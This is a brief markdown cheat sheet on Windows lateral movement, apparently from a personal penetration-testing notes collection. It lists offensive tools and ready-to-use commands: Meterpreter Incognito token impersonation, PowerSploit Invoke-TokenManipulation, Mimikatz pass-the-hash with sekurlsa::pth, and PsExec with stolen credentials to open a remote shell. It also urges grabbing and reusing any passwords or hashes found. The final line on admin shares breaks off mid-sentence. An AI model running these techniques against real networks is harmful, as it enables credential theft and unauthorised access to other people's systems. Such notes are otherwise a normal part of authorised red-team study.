lateral-movement.md 1.4 KB


title: Lateral Movement date: 2021-01-13 categories: [cheatsheets]

tags: [security, windows]

Lateral Movement

Detailed information:

https://fuzzysecurity.com/tutorials/25.html

Tools:

  • nbtscan # Get NetBios information for a host
  • PSExec # get shell to another host with credentials/or hash only!
  • Mimikatz # dump hashes, passwords, and do pretty much everything
  • Incognite # tool to impersonate tokens

Smash-and-grab

  • get whatever credentials you can get and try to use it
  • passwords and hashes, doesnt matter

Token impersonation

Grab tokens of other users (using NtQuerySysteminformation vodoo) can impersonate these tokens to do stuff as another user!

-> user must be logged in!

<meterpreter session>
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username

// or, if it is working, use powersploit:

Invoke-TokenManipulation

Mimikatz

Local Pass the Hash:

mimikatz> privilege::debug      # check if debug priv is set
mimikatz> sekurlsa::pth /user:<user> /domain:. /ntlm:<hash>

PsExec

  • metasploit module: exploit/windows/smb/psexec
  • microsoft one: cmd> PsExec.exe \10.0.0.100 -u <user> -p <pass> cmd
  • metasploit module: exploit/windows/smb/psexec

Admin shares

Admin shares are automatically created by windows contain all partitions as hidden admin share C:\ = \ip